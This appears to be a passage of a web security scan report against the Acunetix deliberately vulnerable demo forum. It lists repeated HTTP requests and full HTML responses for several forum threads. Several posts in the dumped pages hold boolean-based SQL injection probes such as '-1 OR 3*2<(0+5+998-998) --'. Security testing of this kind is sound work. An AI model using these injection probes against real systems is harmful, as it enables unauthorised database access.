src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:49 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=63 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=63 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4126 |
Response Body - size: 4,126 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=64 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=64 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4152 |
Response Body - size: 4,152 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 2+998-998-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=65 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=65 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4152 |
Response Body - size: 4,152 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:16 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3+998-998-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=66 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=66 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4150 |
Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2<(0+5+998-998) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=67 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=67 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4150 |
Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2>(0+5+998-998) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=68 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=68 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4148 |
Response Body - size: 4,148 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:18 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 2+689-689-1=0+0+0+1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=69 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=69 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4148 |
Response Body - size: 4,148 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:19 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3+689-689-1=0+0+0+1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" 